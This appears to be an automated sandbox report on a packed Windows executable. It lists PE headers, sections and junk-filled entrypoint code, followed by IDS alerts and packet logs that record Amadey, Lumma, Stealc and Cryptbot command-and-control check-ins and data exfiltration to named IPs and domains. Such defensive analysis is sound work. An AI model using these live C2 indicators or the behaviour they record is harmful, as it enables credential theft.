Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F423C57BE5Ah
setl byte ptr [esi]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x4d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x324e10	0x10	tklukryc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x324dc0	0x18	tklukryc
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	cb8fb8d99dcf1a088e0ec840c8e73892	False	0.9978127128746594	data	7.980708133765683	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x4d8	0x600	bc2cfc1f093eaac61e2d543377a7538d	False	0.359375	data	5.179173367867664	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tklukryc	0x6b000	0x2ba000	0x2ba000	ee624eb55ead7906743878816e6c093d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ednrpsaq	0x325000	0x1000	0x600	e51bd960da7cf4aaff9c7ba4c3034cfe	False	0.5748697916666666	data	5.015994534913802	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x326000	0x3000	0x2200	c86b30190507774f3a619241ee41ff3d	False	0.060776654411764705	DOS executable (COM)	0.7993268249904945	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x69070	0x2e6	XML 1.0 document, ASCII text, with CRLF line terminators			0.45417789757412397
RT_MANIFEST	0x69358	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-17T06:01:58.824490+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	50096	185.215.113.16	80	TCP
2024-12-17T06:03:05.331223+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.5	49817	185.215.113.43	80	TCP
2024-12-17T06:03:09.775893+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49830	31.41.244.11	80	TCP
2024-12-17T06:03:14.327568+0100	2058218	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)	1	192.168.2.5	57659	1.1.1.1	53	UDP
2024-12-17T06:03:14.561874+0100	2058222	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)	1	192.168.2.5	64803	1.1.1.1	53	UDP
2024-12-17T06:03:15.273742+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.5	49827	TCP
2024-12-17T06:03:15.561978+0100	2058222	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)	1	192.168.2.5	64803	1.1.1.1	53	UDP
2024-12-17T06:03:16.607530+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49846	185.215.113.43	80	TCP
2024-12-17T06:03:17.262647+0100	2058223	ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)	1	192.168.2.5	49849	104.131.68.180	443	TCP
2024-12-17T06:03:17.262647+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49849	104.131.68.180	443	TCP
2024-12-17T06:03:17.264956+0100	2822521	ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)	1	104.131.68.180	443	192.168.2.5	49849	TCP
2024-12-17T06:03:17.687386+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49849	104.131.68.180	443	TCP
2024-12-17T06:03:17.687386+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49849	104.131.68.180	443	TCP
2024-12-17T06:03:17.700628+0100	2058214	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)	1	192.168.2.5	59783	1.1.1.1	53	UDP
2024-12-17T06:03:18.160270+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49850	31.41.244.11	80	TCP
2024-12-17T06:03:18.715600+0100	2058214	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)	1	192.168.2.5	59783	1.1.1.1	53	UDP
2024-12-17T06:03:20.614881+0100	2058215	ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)	1	192.168.2.5	49856	178.62.201.34	443	TCP
2024-12-17T06:03:20.614881+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49856	178.62.201.34	443	TCP
2024-12-17T06:03:20.616729+0100	2822521	ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)	1	178.62.201.34	443	192.168.2.5	49856	TCP
2024-12-17T06:03:21.193694+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49856	178.62.201.34	443	TCP
2024-12-17T06:03:21.193694+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49856	178.62.201.34	443	TCP
2024-12-17T06:03:21.227020+0100	2058220	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)	1	192.168.2.5	53801	1.1.1.1	53	UDP
2024-12-17T06:03:21.453049+0100	2058218	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)	1	192.168.2.5	63632	1.1.1.1	53	UDP
2024-12-17T06:03:21.595703+0100	2058216	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)	1	192.168.2.5	56126	1.1.1.1	53	UDP
2024-12-17T06:03:21.821500+0100	2058236	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)	1	192.168.2.5	57611	1.1.1.1	53	UDP
2024-12-17T06:03:22.051545+0100	2058210	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)	1	192.168.2.5	58086	1.1.1.1	53	UDP
2024-12-17T06:03:22.277076+0100	2058226	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)	1	192.168.2.5	50642	1.1.1.1	53	UDP
2024-12-17T06:03:24.133210+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49866	104.121.10.34	443	TCP
2024-12-17T06:03:24.942735+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.5	49866	104.121.10.34	443	TCP
2024-12-17T06:03:28.924474+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49877	185.215.113.43	80	TCP
2024-12-17T06:03:30.374864+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49882	31.41.244.11	80	TCP
2024-12-17T06:03:37.199585+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49899	185.215.113.43	80	TCP
2024-12-17T06:03:38.648148+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49902	31.41.244.11	80	TCP
2024-12-17T06:03:49.506293+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49928	185.215.113.43	80	TCP
2024-12-17T06:03:50.974065+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49933	185.215.113.16	80	TCP
2024-12-17T06:03:57.511973+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49951	104.21.2.110	443	TCP
2024-12-17T06:03:57.938016+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49953	185.215.113.43	80	TCP
2024-12-17T06:03:58.228416+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49951	104.21.2.110	443	TCP
2024-12-17T06:03:58.228416+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49951	104.21.2.110	443	TCP
2024-12-17T06:03:59.464541+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49959	104.21.2.110	443	TCP
2024-12-17T06:03:59.557505+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49958	185.215.113.16	80	TCP
2024-12-17T06:04:00.206136+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49959	104.21.2.110	443	TCP
2024-12-17T06:04:00.206136+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49959	104.21.2.110	443	TCP
2024-12-17T06:04:02.322645+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49967	104.21.2.110	443	TCP
2024-12-17T06:04:05.309508+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49975	104.21.2.110	443	TCP
2024-12-17T06:04:06.125830+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49975	104.21.2.110	443	TCP
2024-12-17T06:04:08.022548+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49982	104.21.2.110	443	TCP
2024-12-17T06:04:08.466074+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49983	185.215.113.43	80	TCP
2024-12-17T06:04:09.922441+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49988	185.215.113.16	80	TCP
2024-12-17T06:04:10.193536+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49990	104.21.2.110	443	TCP
2024-12-17T06:04:12.520678+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49996	104.21.2.110	443	TCP
2024-12-17T06:04:12.568291+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49997	104.21.2.110	443	TCP
2024-12-17T06:04:12.784714+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49995	185.215.113.206	80	TCP
2024-12-17T06:04:13.233768+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.5	49995	185.215.113.206	80	TCP
2024-12-17T06:04:13.355153+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.5	49995	TCP
2024-12-17T06:04:13.522333+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49996	104.21.2.110	443	TCP
2024-12-17T06:04:13.522333+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49996	104.21.2.110	443	TCP
2024-12-17T06:04:13.682585+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.5	49995	185.215.113.206	80	TCP
2024-12-17T06:04:14.001891+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.5	49995	TCP
2024-12-17T06:04:14.310510+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50006	185.215.113.43	80	TCP
2024-12-17T06:04:14.750910+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50004	104.21.2.110	443	TCP
2024-12-17T06:04:15.302791+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.5	49995	185.215.113.206	80	TCP
2024-12-17T06:04:15.484868+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50004	104.21.2.110	443	TCP
2024-12-17T06:04:15.484868+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50004	104.21.2.110	443	TCP
2024-12-17T06:04:15.748560+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49995	185.215.113.206	80	TCP
2024-12-17T06:04:15.939774+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50007	104.21.2.110	443	TCP
2024-12-17T06:04:17.430840+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50014	104.21.2.110	443	TCP
2024-12-17T06:04:19.650504+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50035	104.21.2.110	443	TCP
2024-12-17T06:04:20.832708+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50045	185.215.113.16	80	TCP
2024-12-17T06:04:21.025514+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.5	50046	104.154.220.71	80	TCP
2024-12-17T06:04:21.767841+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50050	104.21.2.110	443	TCP
2024-12-17T06:04:22.797197+0100	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.5	50055	104.154.220.71	80	TCP
2024-12-17T06:04:24.342384+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50058	104.21.2.110	443	TCP
2024-12-17T06:04:27.497100+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50069	104.21.2.110	443	TCP
2024-12-17T06:04:28.291635+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	50069	104.21.2.110	443	TCP
2024-12-17T06:04:29.109141+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50073	104.21.2.110	443	TCP
2024-12-17T06:04:29.561614+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50074	104.21.2.110	443	TCP
2024-12-17T06:04:29.830402+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50073	104.21.2.110	443	TCP
2024-12-17T06:04:29.830402+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50073	104.21.2.110	443	TCP
2024-12-17T06:04:30.300962+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50074	104.21.2.110	443	TCP
2024-12-17T06:04:31.076588+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50075	104.21.2.110	443	TCP
2024-12-17T06:04:31.786746+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50075	104.21.2.110	443	TCP
2024-12-17T06:04:31.786746+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50075	104.21.2.110	443	TCP
2024-12-17T06:04:31.810847+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	50076	185.215.113.16	80	TCP
2024-12-17T06:04:34.003186+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50077	104.21.2.110	443	TCP
2024-12-17T06:04:36.333182+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50079	104.21.2.110	443	TCP
2024-12-17T06:04:37.019026+0100	2830238	ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent	1	192.168.2.5	50082	185.208.159.109	80	TCP
2024-12-17T06:04:37.985621+0100	2819705	ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin	1	192.168.2.5	50082	185.208.159.109	80	TCP
2024-12-17T06:04:37.985621+0100	2829909	ETPRO MALWARE LiteHTTP Bot CnC Checkin M2	1	192.168.2.5	50082	185.208.159.109	80	TCP
2024-12-17T06:04:38.430322+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50084	104.21.2.110	443	TCP
2024-12-17T06:04:40.607830+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50088	104.21.2.110	443	TCP
2024-12-17T06:04:41.332192+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	50088	104.21.2.110	443	TCP
2024-12-17T06:04:41.827114+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	50087	185.215.113.206	80	TCP
2024-12-17T06:04:43.537379+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50089	104.21.2.110	443	TCP
2024-12-17T06:04:43.673057+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	50087	185.215.113.206	80	TCP
2024-12-17T06:04:44.942614+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	50087	185.215.113.206	80	TCP
2024-12-17T06:04:45.317105+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	50089	104.21.2.110	443	TCP
2024-12-17T06:04:45.969987+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	50087	185.215.113.206	80	TCP
2024-12-17T06:04:46.565132+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50090	104.21.2.110	443	TCP
2024-12-17T06:04:47.556627+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50090	104.21.2.110	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 06:03:03.737955093 CET	49817	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:03.857835054 CET	80	49817	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:03.858450890 CET	49817	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:03.858668089 CET	49817	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:03.978393078 CET	80	49817	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:05.331137896 CET	80	49817	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:05.331223011 CET	49817	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:06.840785027 CET	49817	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:06.841100931 CET	49827	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:06.960808992 CET	80	49827	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:06.960887909 CET	49827	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:06.960895061 CET	80	49817	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:06.960951090 CET	49817	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:06.961087942 CET	49827	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:07.083839893 CET	80	49827	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:08.323343039 CET	80	49827	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:08.323355913 CET	80	49827	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:08.323425055 CET	49827	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:08.327642918 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:08.449580908 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:08.449661016 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:08.449872971 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:08.569911957 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.775610924 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.775631905 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.775649071 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.775671005 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.775685072 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.775698900 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.775857925 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.775871992 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.775885105 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.775892973 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:09.775899887 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.776138067 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:09.776138067 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:09.776138067 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:09.897166014 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.897187948 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.897416115 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:09.901185989 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.901201963 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.901259899 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:09.901302099 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:09.909507036 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.909584045 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:09.967729092 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.967744112 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.967827082 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:09.970144033 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.970221043 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:09.970246077 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.970303059 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:09.978552103 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.978569984 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.978625059 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:09.978703022 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:09.984949112 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.985009909 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:09.985173941 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.985229015 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:09.993495941 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.993588924 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:09.993680954 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:09.993746996 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.001805067 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.001859903 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.001862049 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.001933098 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.010206938 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.010288000 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.010324955 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.010386944 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.018564939 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.018627882 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.018704891 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.018755913 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.026999950 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.027053118 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.027137995 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.027196884 CET	49830	80	192.168.2.5	31.41.244.11
